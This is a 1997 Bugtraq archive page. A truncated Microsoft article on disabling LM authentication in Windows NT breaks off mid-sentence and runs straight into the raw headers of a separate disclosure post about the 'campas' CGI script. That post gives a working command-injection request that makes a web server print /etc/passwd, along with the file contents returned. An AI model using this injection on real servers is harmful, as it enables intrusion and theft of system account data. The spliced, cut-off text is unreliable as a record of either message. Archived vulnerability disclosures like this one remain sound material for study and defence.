Bugtraq archives for 3rd quarter (Jul-Sep) 1997: new post SP3 hotfix: lm-fix
new post SP3 hotfix: lm-fix
Alex Libenson (
alex
DAN.LV)
Sat, 12 Jul 1997 21:16:01 +0300
ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/lm-fix
DOCUMENT:Q147706
TITLE :How to Disable LM Authentication on Windows NT
PRODUCT :Microsoft Windows NT, Windows 95, Windows for Workgroups 3.11 and LAN Manager 2.2c
PROD/VER:2.2 3.11 4.0 95
OPER/SYS:WINDOWS
KEYWORD :kberrmsg kbfile ntsecurity NTSrvWkst ntstop
--------------------------------------------------------------------------
The information in this article applies to:
- Microsoft Windows NT Workstation version 4.0
- Microsoft Windows NT Server version 4.0
- Microsoft LAN Manager version 2.2c
- Microsoft Windows for Workgroups version 3.11
- Microsoft Windows 95
--------------------------------------------------------------------------
SUMMARY
=======
Windows NT supports the following two types of challenge/response
authentication:
- LanManager (LM) challenge/response
- Windows NT challenge/response
To allow access to servers that only support LM authentication, Windows NT
clients currently send both authentication types. Microsoft developed a
patch that supports a new registry From owner-bugtraqNETSPACE.ORG Wed Jul 16 06:02:05 1997
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by enteract.com (8.8.5/8.7.6) with ESMTP id GAA07872; Wed, 16 Jul 1997 06:02:02 -0500 (CDT)
Received: from unknownnetspace.org (port 6919 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <35953-29504>; Wed, 16 Jul 1997 04:25:35 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
spool id 4391835 for BUGTRAQNETSPACE.ORG; Wed, 16 Jul 1997 04:19:04
-0400
Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by
netspace.org (8.8.5/8.8.2) with ESMTP id EAA12307 for
<BUGTRAQNETSPACE.ORG>; Wed, 16 Jul 1997 04:18:16 -0400
Received: from unknownnetspace.org (port 6919 [128.148.157.6]) by
brimstone.netspace.org with ESMTP id <35892-29502>; Wed, 16 Jul 1997
04:21:58 -0400
Approved-By: aleph1UNDERGROUND.ORG
Received: from castor.javeriana.edu.co (castor.javeriana.edu.co
[200.3.149.198]) by netspace.org (8.8.5/8.8.2) with ESMTP id TAA29138
for <BUGTRAQNETSPACE.ORG>; Tue, 15 Jul 1997 19:17:04 -0400
Received: from localhost (ftorreslocalhost) by castor.javeriana.edu.co
(8.7.5/8.7.3) with SMTP id SAA01292 for <BUGTRAQNETSPACE.ORG>; Tue,
15 Jul 1997 18:24:31 -0500
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.3.96.970715180941.1257A-100000castor.javeriana.edu.co>
Date: Tue, 15 Jul 1997 18:24:31 -0500
Reply-To: Francisco Torres <ftorresCASTOR.JAVERIANA.EDU.CO>
Sender: Bugtraq List <BUGTRAQNETSPACE.ORG>
From: Francisco Torres <ftorresCASTOR.JAVERIANA.EDU.CO>
Subject: Bug CGI campas
To: BUGTRAQNETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.970715183741.21934G-100000typhaon.ucs.uwa.edu.au>
CAMPAS SECURITY BUG
-------------------
ET Lownoise Colombia 1997
CGI: campas
#!/bin/sh
#pragma ident "(#)campas.sh 1.2 95/05/24 NCSA"
Impact: Execute commands
Exploit:
> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P
Solution: 1-If u dont use it erase it.!
2-Dont use it again.. (go point 1)
Well another line to put in vito.ini.
ET LOwnoise 1997 Colombia
